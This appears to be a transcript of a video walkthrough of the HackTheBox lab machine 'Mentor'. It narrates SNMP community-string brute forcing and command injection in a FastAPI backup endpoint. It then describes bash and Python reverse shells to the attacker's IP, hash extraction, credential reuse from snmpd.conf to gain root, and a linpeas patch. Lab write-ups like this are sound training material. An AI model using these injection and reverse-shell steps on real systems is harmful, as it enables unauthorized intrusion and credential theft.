HackTheBox - Mentor

Key Takeaways

what's going on YouTube this is ipsag we're doing Mentor from hack the box which is a relatively straightforward box as long as you value Recon and take things slowly and have a good workflow and I say that because there's a step early on in the box that if you Skip it's gonna just spin your wheels consistently because you have to enumerate SNMP as running on the box and then Brute Force the community string and there's a trick to brute force in the communities during a lot of the tools for some reason just fail I don't know why but like Hydra and 161 won't find the internal Community string you have to use a tool called SNMP brute at least that's the tool I use to find it um and if you don't do that you'll find an API web page that's coded in fast API but you can't do much without finding the SNMP info first and then once you get a shell on the box the next step is finding a password that's coded in the SNMP config file I think it's part of like snmpv3 but if you just run a lot of tools like lint piece for some reason it doesn't detect that so at the end of the video we'll go over lint piece and add it and so we detect it in the future with that being said let's just jump in as always we start off with and map so SC for default scripts SV enumerate versions oh a output all formats put in the end map directory and call it Mentor then the IP address of 10 10 11 193. this can take some time to run so I've already ran it looking at the results we have just two ports open the first one being SSH on Port 22 and its Banner tells us it's an Ubuntu Server we also have HTTP on Port 80. its Banner tells us its Apache hdpd version 2452 and also that it is Ubuntu it's also redirecting us to mentorquotes.htb so if we went to the website 10 10 11 193 we get a 404 page because we don't have that in our host file so let's add it there so sudo VI etsyhost and then 10 10 11 193 Mentor quotes Dot hdb so now when we refresh the page we get to a page that just has a bunch of quotes So the very first thing I want to do is look at the header we could use Curl but burp Suite is a bit quicker let's make sure intercept is on then send it go over to well I meant to go to the repeater tab and we can look at it and we see it's work Zug and python so we know this is going to be a python application it's probably going to be flask we could verify it by just getting like a 404 page so if we go to like does not exist we see this error message if you Google error messages generally they tell you something even if it looks generic and we see Bunches of flask so we know this is going to be a flask web server there's no point in like doing um the extension PHP when we look for things so I'm going to set up a go Buster to enumerate this or gobuster dir Dash U HTTP mentorquotes.hdb word list up seclist Discovery web content raft small words dot text I guess we should store an alfal so root dot out and as that runs we can also do some virtual host enumeration because it has directed us to a DNS name so I'm going to do buff we could also use Go Buster I've been a bigger fan of buff lately for using um this type of enumeration so mentorquotes.htb add the host header so Dash Capital H host and then fuzz Dot mentorquotes.htb and the word list opt seclist uh let's do Discovery DNS and we'll do SUB domains top million twenty thousand sure so I'm gonna hide everything with 18 words so we do Dash fw18 and then the other thing we really need to do I wish it was default on F is a dash MCR to match all error codes so I'm gonna do Dash MC all and right off the bat we get a 404 error code on API so I'm going to add that to my host file so sudo VI Etsy host and then we can add API dot mentor quotes.htb save it and take a look at it so API Dot and we get this one page um I'm gonna guess this is fast API right off the bat just based upon it returning the Json like that um if we put that in our host header we can see the server is uh UV icon I don't know how to pronounce that but it is just returning Json a very common thing with uh fast API actually let's just Google this thing um I'm gonna go to Google 10 rep Suite off if I Google this response what happens uh Django we have one fast API post but um this is definitely fast API and fast API does have a slash docs right so I just know that from playing with the framework and going to slash docs gives us this wagger page glancing added it doesn't look like any of these endpoints require authentication because we don't see the lock next to their name however when we click on it we do see the authorizations required clicking execute we can put something here and then going in it says it requires the header authorization so authentication is required fast API just isn't configured um with authentication in mind it is one of my big pet peeves because I really like seeing the locks next to each endpoint because number one the lack of authentication on some API endpoints is a common finding so making it visual lessens that chance also um you know authentication is being done uniformly across all of your endpoints when you have a visual representation so we'd have to click on each one of these and make sure and test just because it's not coded the right way um we'll look at it at the end of the video to see exactly how to do that but all these endpoints require authentication except the sign up so let's try out this endpoint we can sign up with our email we can do like root ipsec dot rocks and then a username of will do ipsec and then a password of will do password right and then we click execute and we can see user ID 4 is created so now when I go over to the login endpoint we can do try it out log in with the same email username of ipsec password of password and then click execute we can see it gives us a JWT back I'm saying JWT because I see three base64 strings if we look at this one Echo dash n base64-d the JWT is username ipsec email root ipsec.rocks so username and emails in this I'm going to copy this real quick and then we can go to the user's endpoint now that we have a user account paste this in Click execute and it wants the header again so maybe I need to do authorization like this click execute it's not working let's send it over to burp Suite to see exactly how this is looking so I'm going to click execute and we see um the actual page isn't adding it at all and um I'm pretty sure if we did the proper way then there would be a way to add this authorization header to everything I want to say we need to add Bearer um maybe not does that work no so sometimes with jwts you add Bears sometimes not so here we can see only admins can access this resource I'm going to do slash one to see if we can even get like user information we're a user id4 we still can't get it and I know I think rainy day had like 4.0 to put a float here and did something and if we do that here only admins can access the resource so can't really get any details out of this uh we could look at the quotes endpoint so now that we have this we can just edit a request I'm going to put this to be users this can be quotes if we get quotes it returns all the quotes that we saw on the first page if we do one we get this one if we do a float we get the value is not a valid integer so this is a pedantic thing most likely just because fast API generally use um pedantic for handling inputs and outputs and all that does is like a strict typing thing so you can't um give it unexpected input or it doesn't give you unexpected output it's a really nice thing that we'll probably dig into in a little bit so let's look at what else is the quotes if we do a post we can create a quote so let's do post and just hit the quotes endpoint only admins can access it uh let's see we could do a put probably going to say only admins right method not allowed so we need to do put on quotes one only admins and delete I'm guessing only admins as well right yes so I don't know exactly what we could do we could like I was gonna say we could try like SQL injection here right but again the pedantic is going to stop us from sending anything but an integer to this field so nothing we can really do so we have to go back and think of what Recon maybe this API isn't showing us all the endpoints so one thing we could do is a fuss so I'm going to um copy this to a request so copy to file I'm going to make this API dot request save it and we'll vapi.request and I'm going to do a fuzz here and we can do fluff uh Dash request API Dash request Proto HTTP word list opt seclist discovery um web content is there API here let's see uh let's just save this and then find grab this grep Dash I API so web content API and lowercase okay common paths sure Dash MC all and let's see status 404 let's Dash filter words too and we don't get anything here let's see instead of common paths what else is there we can do actions lowercase and we see there is a slash admin and the main reason I used buff here instead of Go Buster is just because I could paste in the Raw request and don't have to worry about the authorization header um I know I could have done it with the flag and go Buster but I like passing the request like you saw me just do so if I get slash admin we can see exactly what this looks like only admin users can access this so we have to figure out how to get to an admin and if I went back to this we see James mentioned twice we have an email for James but we don't have his password we could try logging in and just guessing it right so if we try it out and do James at Mentor quotes dot hdb I think it was and then James we could try logging in uh we probably should disable burp Suite and we get not authorized so we could do like or one equals one and try SQL injection here but it's probably super unlikely and we don't get it as well um so at this point I'd run out of things to think of and maybe there's another service I'm just missing right so do sudo nmap Dash p dash dash V to show open ports as we find them Dash o a and map all ports 10 10 11 193. and then we can also let's see let's clean this pane up so the bottom one is that end map we could do a second end map so sudo nmap Su to do UDP Dash o a and map we'll call this UDP 10 10 11 193 and again Dash V to see open ports as it finds them so we can see how long nmap sometimes can take and this is why I always say have Recon running in the background because you can't hack time uh this one took around three minutes and 25 seconds and we still have this end map going on and we haven't found the port that we need on this UDP scan so it's always something you should do at a habit just in the background um we're gonna keep it running hopefully it finds it and did not miss it because we had an nmap running while we did this port scan okay so it's been almost 20 whole minutes and nmap has finished for the UDP and what's more frustrating is the port I was expecting to see SNMP is not on this list and when it was running I always thought about canceling and restarting it because I had an idea what went on when I saw all these error messages above but I decided to let it play through just so we can use this as a learning experience because um if you're doing too many things at once especially with UDP scans you'll get mixed results and things like that so I'm just going to run it now that I don't have a second nmap running and we're gonna see if it finds the um SNMP port and how long this takes so we see it's still doing a few errors and that's just because of the VPN and maybe it's going to do all the same ones I did not actually expect to see that so it went four five six seven eight so we still have that send delay going on so let's see if it ends up finding SNMP this second time still it's probably going to take about 20 minutes to run but hopefully um it finds SNMP this time so I'm just going to let run pause the video again and we'll see what happens and we finally have UDP 161 reported open I'm going to let nmap finish just to see how long it takes see if it's still like 20 minutes and then we're going to run nmap one more time just to make sure it discovers 161 two times in a row when we're not doing anything in the background so here we have the output of the second end map we see it's 1008 seconds I think the other one was like 1100 looking at it yeah we see 1100 here but we do have 161 open I'm going to run it one last time and we're going to see how long it takes and if 161 is open I'm assuming it will be but honestly I don't know and this probably would go faster if I was connected to a US VPN server because I am in the US but I'm currently connected on a European one so the latency is a bit higher so my UDP and map will go slower um so let's just hope 161 does show up okay so I'm not exactly sure what happened here but our nmap shows a lot of UDP filtered ports that being said there is just one open and that is going to be SNMP so after doing the video and talking to oxdf uh he reminded me of one super handy flag when doing nmap and that is the Min rate flag so I'm going to set the Min rate to 10 000 and then just do 10 10 11 193 and we can see UDP um reliably discovers 161 even at this High rate and it only takes one second to run so this definitely does come pretty handy if you want to detect SNMP on future boxes when doing the Min rate this High just be careful because like all these close ports um it's not reliable going to be the same one and I think that's just because you're flooding the packet um if you look at it on a network capture you'll see that even though you send like a udb request to 2148 the server will respond within um icmp back saying the destination is not reachable if that Port isn't open sometimes and I think when you do this many packets at once it can't send all those requests back to you and you miss some so um yeah so hopefully you enjoy the Min rate piece let's get back to doing the Box so the path through this box is most likely SNMP so let's do a SNMP walk against it so SNMP walk Dash v2c which is the default version that you normally use and see public that's the default Community string and then 10 10 11 I think it was 193 yep and we start getting things I saw a um admin at mentorquotes.htb uh this I think is a default thing but there isn't any good information in SNMP however there is a possibility there's a second Community string configured so I'm going to go and download SNMP brute which is just a good uh brute forcing script for this uh let's see python GitHub there we go and then let's just clone this to our box so git clone copy it and then we can do python3 SNMP brute dot pi to see the options there are and there's quite a bit um let's see we want Dash T the IP and dash F the dictionary so I'm going to do a find on seclist to find a good word list first I'm just going to grab Dash I SNMP and we have this one so I think any of these would work um Let's see zerg's wc-l we can see how big each of these files are 118 lines that's a good one for a first um bet so let's do python and then it was Dash T the IP so 10 10 11 193 and then I think just the community string or the dictionary with Dash f for a file I guess we run this and we see there is version one public version two public and version two internal so we do have a um internal one and I you could do Dash B for brute so it doesn't ask you for enumeration generally I don't like using these snmb tools to do enumeration I just use SNMP walk before moving on I just wanted to show some other SNMP tools and show it just didn't work so um if you use these tools and your current um setup I would definitely switch out for SNMP Brew right so we do 161 which I think is the tool I used a long time ago in the last box that required SNMP uh let's see what is dash H so we need Dash I for the IP 10 10 11 193. oh it wants it to be a file so we can trick this with this little bass trick so now it runs this command and treats it as a file when you do it with this less than a parenthesis but we do see it comes back twice with public it doesn't pick up the internal which is odd um if we grep internal on the word list we see it's there if we grab public on the word list uh we have all public I don't know let me try one thing real quick pseudo VI all public I'm going to delete that from it we're going to run it again so it looks like it's just treating the all public as published for some reason it doesn't pick up on internal which I just can't understand why um so 161 failed we also have Hydra so you can do like Hydra Dash p opt seclist Discovery SNMP comment strings dot text and then Dash V the IP and then s and MP and it will quickly resolve public but it never will discover internal I think it takes about like 10 minutes to run for some reason um Hydra is slow in this sense so I'm just going to pause the video we'll come back to it and show um it did not detect internal it it finished a bit quicker than I expected only taking I think one minute however Hydra only detected public so both Hydra and 161 fail to detect the internal Community string for this box um so definitely use SNMP Brew but with that being said let's get back to the Box so if I do go back up here we do SNMP walk and put internal here it's going to dump a lot of information now this this one can take a while I'm gonna do time against this and then we're gonna do a SNMP bulk walk as well and we're going to see the difference on the two so let's do um if I just paste this I think bulk walk has the same arguments it does sweet so let's do time against that and we'll call this bulk dot out and I'll use T so I can see the output as it comes let's copy here we go t bulkwalk dot out and then we can just do a time here um it's going to give me the same exact information I just want to see um the time so I'm going to pause the video let both of these finish and we're going to see how long they take so the regular SNMP walk took about 13 minutes and SNMP bulk walk took around one minute so it's definitely faster to use bulk walk when dumping the entire um MIB and we see a lot more information than we had saw when we just looked at um the public Community string right this is showing like all installed software right now we have a list of packages here there's also going to be the actual programs and arguments that is running so let's just take a look at this type of area so I'm going to do a less against the file and then search for um HR software run path and we can see everything here I want to say the 362 these are pids I may be wrong there but we do see it jumping so I know it's not incremental um almost positive it is a PID and this isn't showing the um arguments but there is another one that will show Arguments for instance we see just this one python thing running here there's a python thing running here as well if we looked at two one two three let's grab that real quick so I'm going to grab two one I actually have to go in SNMP Brute well no we're here bulk walked out okay so grab what'd I say 2123 right here yep two one two three on blockwalk dot out and we can see everything related to this so I'm guessing this is just telling us the PID here is uh the pipe like the program the python is running we have the path to python um this is probably going to be the CMD line if you looked in like slash proc and we see login.pi and some credential and then nothing else right so this is probably going to be a password to something just because it's being passed to login.pi and this is one of those reasons why any type of hardening thing will tell you never to put passwords as arguments just because it gets leaked when you do um processes so like PS Dash EF and things like that so let's grab on 2050. let's just see something else and then we'll move on right so 2050 we can see this one is python this is doing some multiplexing semaphore track I want to say this is the fast API um let's see what did we just do um let's try 1916. I don't think I checked that I was trying to find the fast API server but it's going to be one of these here we go UV icon so this is most likely fast API we can also see the dash dash reload which means the um web server will automatically load new code if you manage to write to a file on it and so it behaves kind of like PHP in that aspect where if you write to a PHP file then call it again it gets executed if this reload wasn't in this then if we wrote to a python file it wouldn't take effect until python itself is restarted so this is just monitoring all file rights to the Python scripts within the directory and if they change it reloads the server right but we have this password to um login.pi and if we go back to Mentor we did have an email username so I'm going to put that password and for this and then when I click execute we get a session ID and before we're getting like invalid user or something so now we have a way to um access admin endpoints right so if I went to users and we run this again uh let's see path ID oh not a valid integer so we put this user not found we can dump a list of users if we do it with no arguments we get one two it's odd that let's see 34 so user not found I wonder what my user ID is unless my user got deleted that I created in the box so we'll have to look at the code there to see exactly what this endpoint is doing that I don't see the user I created but we have two usernames James and SVC we could try logging into SVC but um it's not going to work I just knew that from the power of hindsight so let us check that admin endpoint remember there's there's this endpoint art slash admin that only admin can access and if we try to we can see there's a slash check and slash backup now so if I enter slash check we get not implemented yet so let's do slash backup and we get method not allowed so if we do a let's try options uh not allowed let's try post there we go so now we have an error on possible entity it requires a body so since this is fast API I'm just going to put Json and I don't know any Fields so I'm just opening closed curly bracket so we put something in the body and it tells us now path is required so if I do path and then Etsy pass WD and then I guess end it with a comma let's see I screwed something up here okay so it doesn't want to be ended with a comma for some reason I guess that's uh just how it expects Json I bet if we had multiple variables then you'd put commas in but the last one does not and we just get info done when we run this so we can try something with it doesn't exist we still get done um we could try hitting check and we get meth and not allowed let's change it to a get not implemented yet so we don't know exactly what this backup is doing we could test for it like command ejection so we could try Etsy pass WD and then sleep one and see if this request takes one second it does not we can also try a ping so I'm going to test pin against myself because I always get these flags on if it's Dash C or dash n it is Dash C1 so let's do a pseudo TCP dump Dash I ton zero icmp dash n to disable DNS and I'm probably going to add a dash v as well and then try ping Dash C1 10 10 14 8. and I'm going to end it with a semicolon as well just in case um it adds something to the path it takes 200 milliseconds and we get a ping I'm going to try sleep one again real quick because the time does go up when we use ping like this and maybe it was this semicolon that I screwed up with and that was it so what's happening here is it must be putting something after the path and when we don't have the semicolon it creates invalid syntax so it just automatically ends it so since this is a backup feature maybe it's doing tar and it's doing like tar um let's go over here maybe it's doing tur Dash cjvf backup.tar.bz2 and then taking user input here and backing up another file uh let's add this it's adding something at the end after user input I don't know what it is but when I just put sleep2 here like this it appended Etsy pass WD after this which caused my script to error because this is an invalid command when I ended the Sleep 2 with a semicolon then it executes just this and that's why it worked right so now we have some type of blind execution we can try like um a reverse shell now so I can do bash Dash I Dev TCP 10 10 14 8 9001 zero and one like that and again make sure we have that semicolon at the end URL encode it for good measure nclvnp 9001 send it and we just get done we can try putting bash.c before this just in case this is not being executed in Bash and then we run it again still don't have a shell so I'm going to guess we may be in some type of Docker or bash just doesn't have for some reason like the network thing like we did with the dev TCP so I'm gonna get a python reverse shell because we know this box has python because it is fast API so I'm just going to do rev shells.net I think it is or let's see Google rev shells let's see if this comes up real quick Rev shells.com and I'm going to search for python let's just do python1 put our IP and then copy and paste this so paste this and we can say python oh it's already doing python here so when we send this we get some type of errors and that's because of quotes so we have to escape every single quote um does this have anything we could try URL encode let's see what happens with this I'm actually not sure I know escaping the quotes will work but maybe URL encoding does as well does not or I screwed something up so let's just escape the quotes so get rid of that get rid of that let's see what else is there a quote where our host and our Port is okay oh sh as well so now we have escaped all the double quotes So this should be Val and Json and then we run it and we don't get a response here which is a good sign because we have a shell so python3-c import PTY pty.spawn then sh and I'm doing bin sh because I'm not positive bash exists yet so that's done sdty raw minus Echo FG enter twice and now we have a good shell here so we could look for like bash to see if it exists and it doesn't look like it does so that's why a previous reverse shell did not work but the very first thing I always do when I get a shell somewhere is try to get credentials out of the web app and if we look at this uh Docker file we don't see any credentials exposed um oddly enough it is exporting home svc.local bin to path so I'm guessing that's where the um app exists so let's see there is a config.pi if we look at it we don't get anything there is DB dot pi and we have it running postgres and it's going postgres against 172 2201 which I'm going to guess is probably the host let's see ipaddr see I'm in 2203 so postgres is probably going to be um on the host system let's see what else is there do we see postgres credentials that's database user metadata email password database let's see crap Dash RI password does this not have recursive grip on it it does not look like it does so I'm going to do a ls-la to see if there's like a DOT EnV file I do not see one um let's go back in DB dot pi oh the credentials um sometimes default credentials I guess just hide in plain sight so the credentials are postgres postgres to this box we could like you upload chisel to this box and for the port and access it and then get a shell that way um we'll do that probably at the end of the video the way I generally do this if I'm like in a rush or I can't get a reverse shell since we know the reload is on this box um where is it right here we can just edit the file so this is a fast API and if we go into the API directory we can see all the files so if I look at users this is going to be the user endpoint so if we just get user ID we can see it's doing a response model and this is going to be the pedantic piece and if we look at this it's doing users equal to a weight this is going to be some async IO thing so we can run multiple tasks at the same time it doesn't really matter here and it's doing a crud dot get user and cut is just a terminology mainly used for database um like create I forget what it stands for um create R is something update delete so or it's probably some way to Pi create replace update delete is what crud I would guess but if we look at crud.pi the main thing I'm showing here is we don't have anything filtering the password out right and if we look here for a git User it's just doing a users.select and returning a fetch all off the database so there's nothing here that's also filtering the user so what is filtering the user when we get an ID is the response model it's user DB so if we look at the models and this is going to be the pedantic code we don't have them so we can do VI we can see the base model is just ID email username the database is probably returning everything but pedantic is saying return this Json blob with only these variables we know the password is in the user schema so if we add password to the user DB model of pedantic uh we can do password here and I used yank uh like YY and then P for put and I did that because I don't know if this is tabs just bases it's always safer when you're editing code in Vim on a Target to copy and put lines down just so you get all the space incorrect because if I use tab here and it was using spaces the code would crash right so it's just a safety thing so I'm going to write this file and now if I go back to the users right and then we run this um it's not working did I crash the server or maybe this isn't multi-threaded so maybe the service hung while I have this reverse shell we don't see it working exit okay now we get it and we don't have there we go now we have the server reloaded so the server wasn't reloading until I exited this shell and then once I did it reloaded and we see the user model now has password in it so when we get a user we can get the hashes as well what's going on it's me from the future again and I wanted to highlight this whole thing of the web server hanging because it is somewhat a common issue when attacking servers that are in development that don't have something proper like nginx or Apache in front of it that do threading so let's just show this real quick and we run this command we get a shell and nothing responds to um us until this show dies and the whole reason that happens is if we look at ps-ef grep on let's just do app we can see this is the command that's running and it's just got two workers assigned to it I'm pretty sure if we up this to three workers then it would work in the background I think one worker is just the master and then anyone that we connect is another one so when you hang the one thread there's really no more threads left to accept it users and that's why um we're in this state right so if I just have this path to be just Etsy past WD again it's not coming back to us um the web server opens the connection because we're part of that Master worker but when it tries to Fork us over into the other thread it just can't because it doesn't have the workers available so we could fix that but before I do I want to show if you didn't get a proper PTY and Ctrl C out of this session uh it still hangs on the server and it becomes a royal pain right and many people had to revert the box when this type of thing happened thankfully I'm from the future and have a root shell here so we can just do PS Dash EF prep on python see this shell is still running here it's probably this Command right here so I can just do a kill-9 on this and now this comes back to us so the easiest way is just to run a command called No Hub um I'm guessing it's on the container but we can just do no hub and then leave this command and we put an ampersand at the end so if I do ncovnp run it and we did not get a shell so the best way to troubleshoot this is let's just run it locally right so I'm going to take this python shell actually first I'm going to run it on my machine uh unexpected oh because we have all the escapes right let's see we probably want to export this as well so I'm going to get rid of the no hop this is how we have it so I'm going to run this we had a semicolon at the end and we'll have to get rid of the escapes because we're doing that because it was in Json um since we're just running it natively again get rid of those and then one more on sh so we have the shell and we can see my terminal down here does hang so we can exit that and we want to play with no Hub right so if I do no hop python like this I don't have the Ampersand at the end so it's not going to background so that works now let's put the Ampersand here and we get a invalid command because there's the semicolon at the end and remember we have the semicolon here because the actual servers are pending data and we use the semicolon to ignore everything afterwards right um looks like we can't use the amp or the Ampersand and a semicolon that being said um comments will also ignore everything out when we do SQL injection we do the dash dash space that's a comment because we want to ignore what the server adds to it and Bash it's that little um hashtag right and that works so now let us move over to the server and we're going to put a new hook back in and then go to the very end get rid of the semicolon and I'm going to put that Ampersand n and because this is an HTML or whatever special character I'm going to press Ctrl U to URL encode it and if we just send this we get info done so the server responded to us and we have our shell so I can go to this Pane and the server is still working and we have our shell it's happily backgrounded so um now we don't cause an outage when we're playing with this right so we can do PTY or python C import vty PTY spawn bin sh stty raw minus Echo FG and then I'm going to just do a ps-e-f Orest let's see I guess we can do it on this host I just want to see what my reverse shell looks like um I don't even know if I see the no hop that's me right let's see no hop I don't think nohup is even showing up in PS which is pretty cool um but all the no Hub command does is I bet if we demand no hope it'll explain it better than I could uh run a command immune to hang ups with output to a non-tty so I think it's just habit I always run no Hub when I do these things you could probably just do the um Ampersand at the end but I think if you do that and something kills the thread it won't background itself and um it'll die as well I just know no Hub makes things much more stable for me so hopefully you enjoyed this little snippet so I'm gonna go back and edit in a few other things I want to add in this video um we've probably already know James's password because that's the user we logged in as so we have this one credential we want to get this one hash um we can just go to like crackstation and put this in and if it doesn't crack right away then we can go to something like um hashcad and crack it but crackstation is generally my first bet when it's just a hash and not like a b Crypt um it is someone annoying because you do get these captures but then once we crack we can see the password is one two three something I have no clue what that is but we now have the password to SVC so I can do SSH SVC at 10 10 11 193. put in the password and I get logged into the box as the service account and when I was doing the box for the first time I spent a lot of time trying to prevask because this one is not obvious it's in a file but Lin P's itself won't tell you uh the string and at the end of the video we'll probably modify a Lin piece to add it so I never waste that much time on this step again but I kind of want to take all the steps I looked at before running Lin P's to see what is going on I start off with running a ps-ef and I can probably search for root so root stands out a bit more but this is just like looking for various things that are exploitable right and the main thing I see first is well this is us right we sshed into the box we have Apache here we have three different Dockers running which I didn't know we experienced the one here is the login script that we saw before and right now I see postgres um I thought postgres was running on the host because it was 172 2201 but it looks like there's some routing to put postgres into a database so the very first thing I would have tried if I did not run this PS command is going back on the container trying to Chisel my way into postgres and um get a shell that way because postgres does allow you to run commands but I'm just going to be put into a different Docker container so it's not nearly as interesting to me now that I see that right we also have the fast API server running in a container as well and I'm guessing maybe async didn't clean things up because we see a lot of defunct processes I bet if I ran another sleep uh we'd see another one go defunct so there's definitely a bug in the web server not cleaning itself up and it is also running um and a container I think I said that we have this one this is just executing main.pi maybe this is just the initial web page that we accessed we haven't got access to this so maybe we want to look into this one and get a password from that container but um it's not really that interesting to me we could try to find what main.pi is by just doing a fine slash Dash name and we can hide all errors and we can see maybe this is it let's see python3 let's see what this is I don't think this is it um Maybe maybe after we root the Box we can go in that container and see what it is let's see home SVC dot local if we go back to the page Mentor quotes let's see if we can find the file real quick um your daily motivation that's probably a unique string so grep Dash R your daily motivation on this and I don't see anything here we could change it up by doing like slash VAR and we probably want to add Dev null to standard error don't see anything on that maybe home and let's see maybe user will be the last one we check but I want to say if it was in a Docker and we had read access to it it would be in VAR but I don't see it there I'm guessing we don't have access to where the web server is hosted also if this was like verw HTML uh we'd find it just because of it existing right I'm going to cancel that crap because it looks like it's going to take a long time and we could just also I guess curl 172 2001 on Port 8000 we get detail not found if we do localhost on Port 80 it gets moved to Mentor quotes and I'm guessing that's very dub dub dub right HTML see this is not it right no that's the Apache 2 default page so maybe in the Apache config we want to look so sites Dash enabled let's look at the default and we have Mentor quotes and it's going to 172.2201 Port 81. so we know that um this website is in a Docker container and I don't think we have read access to it so we can't really just get credentials out of that or see what it's talking to it's probably talking to the postgres server so at this point I'd probably start looking at forensics so I see this user was probably created around June 7th the next step is to look at when the box was created and I always like seeing the SSH key of the SSH service because this rarely gets regenerated so it's a good idea of when it was created so June 3rd you can't really just take random packages because we see SSH config this was February 25th it's actually before this and the reason why is um it was created as part of the APT package a d package and it kept that file time stamp SSH keys are generated upon like install so that's why that date is different if we run a stat against these so let's do stat on Etsy SSH sh config and we'll do the host key as well so host let's just do DSA key we can see um everything is June 3rd and for SSH config we see this is February 27th February 25th June 3rd and the birth is June 3rd so LS isn't showing the birthday this is when the file was created change is when like a metadata permissions was modified modify is when the file was actually modified and access is supposed to be the last time the file was accessed but I don't know if that like actually works well right because if we do a cat against this and then we do a stat against the same file the access date doesn't update but the ls command what was it showing we do lsla at cssh it is showing February 25th so the date it was last modified and again this comes out of the D package also if you look like at ipsec.rocks for time stamps and stuff you'll notice I talk a lot about this which is the in-depth time stamp like the milliseconds it was created and since it's all zero that's another indicator it was not user created if we look at it on this so we do find or not find stat this we can see all these timestamps are um granular so long way of saying we should look at timestamps um I'm going to look at June 4th to like June 14th because uh June 3rd is when the box was created so June 4th is probably when customizations would happen and June 14th is like a week after right so we'll do a find on let's just look at Etsy to see system services that have changed and then I can do a type f for all files and then newer Mt for newer modified time and we'll do year 2022 June which would be 06.04 and then we also want to say a not so exclamation point newer MD 2022 06 14. I'm going to go back to the beginning of this and do a dash LS so we can see permissions and all that type of stuff and then two devno and let's just do last capital S to put it all on one line and this is showing every file so maybe I want to do the ls at the end I always get these flags kind of mixed up there we go that looks better um so when I put LS up here it was printing out all the files and then doing this which is meaningless so I wanted to put the print part on the very tail end um find arguments are very particular I guess I should say so we see Etsy studio is modified that's something we haven't tested is if we can run sudo on this box I think we also have the SNMP and that's really about it so I'm going to look at the SNMP so if we do a less on Etsy SNMP snmpd.com it is a relatively big file a lot of the default things begin with a comment so what I'm going to do is a grep dash V to exclude and then say everything that begins with a comment exclude it and then I'm gonna do a grep period to grep every line that begins with a character and we can see the SNMP config and one odd thing we see is this create user bootstrap and it has secure password one two three underscore underscore if we look at Etsy pass WD and then let's grab for everything that ends in sh we can see we are the service user we have root and there is James if we ask you to James and put that password in we can log in and then we look at sudo and James can run uh Ben sh as root so we can just do sudo bin sh and now we are root so let's take a step back because Lin P's really should be able to find this I'm guessing let's see I'm not like an expert on SNMP or anything I didn't do that much research into this but I know snmpv3 has its concept of users so I'm guessing this is the start of an snmpv3 config and they just don't fully configure it um we can see where is internal um crap end come to SEC so this is uh let's come to say default internal so this is why we can see the processes on v2c as the internal Community string because of this line but I think V3 the create user is part of that I may be wrong there but we do have a credential right so let's run Lin piece just to confirm this credential doesn't exist and I waited till the end of the video to do this because I want to be able to search this string a super secure password right so I'm going to go Dev shm let's download the very latest blend piece so Len P's GitHub go here go to releases and download so we can download limpeas.sh we should download on our box wget python a web server and we can curl 10 10 14 8 or 8 000 lynnps.sh and we'll pipe the output into lynnps.l um we need to bash and then we can fight there we go so I'm going to let this run and we're going to come back and see if Lynn piece tells us about this password and when it doesn't tell us about the password we're going to modify the limp source code rebuild it and have a copy that will flag this in the future so any machine that we run lint piece on that has SNMP it'll be detected so okay so Lin peas is now done let's get the password that we wanted the super secure password and then if we grep this on um let's see lnps.l it doesn't get found uh we could less super uh blend peas let's see maybe Vim will be better I guess we'll just um I wonder if Cat shows it okay that's better so we can just do SNMP to back search and we can see it actually does have a thing to analyze SNMP specifically and doesn't catch the create user at all right so this is the thing that we want to update so if we go into um opt where we have committed this so this is where Lin piece is installed I'm going to do a get pull to make sure I am up to date and then I'm going to do code dot to open this up in vs code and we can take a look at kind of how it runs so lint bees is when you um commit on it it's a bit weird because it uses this python Builder to copy a bunch of files into one right so what I want to do is find where SNMP is so if we control F or edit find in files we can search SNMP and we see it's in software information it's running PS s and MP win pe's file analysis file info these are net when it ends in dot CS so I'm going to ignore that um we do have sensitive files so if I look at sensitive files we see the name SNMP auto check I think this is just going to be if it's a quick check or not and the way the file snmp.com and bad regex I'm guessing is going to be um bad is objective right when I first think of bad ragx these are like things I don't want to match against but this is what I do want to match against and it's bad well it's not bad to have them in the config um the bad ragx is what's going to be shown so we have our own Community our W Community if we go back to our box we see Ro Community here right so that's probably why these are getting shown so we want to add a create user right and I only care about users um when it starts with create user probably if we go with this yeah so I'm going to put one for create user like this and then we're going to save it and then we have to build uh Lin peas so let's go into Len P's and then go to Builder I can probably python3 Lin P's builder.pi and it errored let's see does Lynn peas and please does he have any instructions for building contributing check out to do so these are things that he once added into Lin piece that's not how to contribute it's Auto built Auto Builder from limpy's Builder huh so I'm going to go in the parent director real quick I'm going to grab this for lin P's Builder we do have this pie cash one of it's not pi there we go so we have a get flow GitHub workflow and that's probably how this is being built so if I left this file Builder so it makes your pie yaml is installed goes into lint piece and then runs this module okay so that should be simple enough so I'm going to go into Lin peas run the exact module that it said and here it is going to start building a new copy of limpies so with this copy hopefully it has the create user check and then when we run it against it we'll see if um the SNMP config shows us um what we want right there we go it is now done if I do it LS I'm guessing it's lynnps.sh so I'm going to grab create user on winpies.sh and we have the regex we have created so let us python3 Dash M HTTP server to host this we probably should delete this web server start this one up and then we can run this again and this time hopefully when we grep it for the super secure password it will show us the line that we want okay Lynn peas has finished so let's run the same grep we did before on limpies.l and we can see it has now found the password so we are now free to create a pull request on Len peas and add or check in so we will always see these create user things so with that being said that's going to be the Box hope you guys enjoyed it take care and I will see you all actually not the end of the video there are two more things I wanted to show that I couldn't find a good place to sneak them into the video the first piece is just simple using chisel to afford postgres to our server so we don't have to modify the web server code in order to get the password because that is a dangerous thing to do if you script the code the web server goes down you lose your shell and you also lose your access so doing chisel just a forward postgres is going to be the easier thing and then after that we're going to fix up the fast API do some development so yeah hope you enjoy the additions so let's say we can run chisel on this box which we could have in the first place so let's get it on there so let's do python three um hdb server um before I download it I'm going to cat db.pi I'm going to copy the postgres URL and we're going to just save it on this pane right so let's go Dev shm W get 10 10 14 8 Port 8000 and I will download chisel like that and it's going to take a minute to download and on this pane we can start up a chisel server so I'm going to dot slash chisel server word dash dash reverse and by default I want to say it listens on Port um 8080 so I'm going to change it to 8001. so in this pane we can connect a client to it and postgres um I forget what port it runs default I want to say like five four three two one so let's do psql Dash H or dash dash help 5432 is the default Port of postgres so let's do chisel and then client and we can connect to 10 10 14 8 Port 8001 and we're going to do a um reverse on Port 5432 one twenty seven zero zero one five four three two uh permission denied let's move chisel to Temp because I guess we can't execute out of Dev shm run this and I don't see it connecting back to me so I must have the syntax wrong let's see do we have NC on thi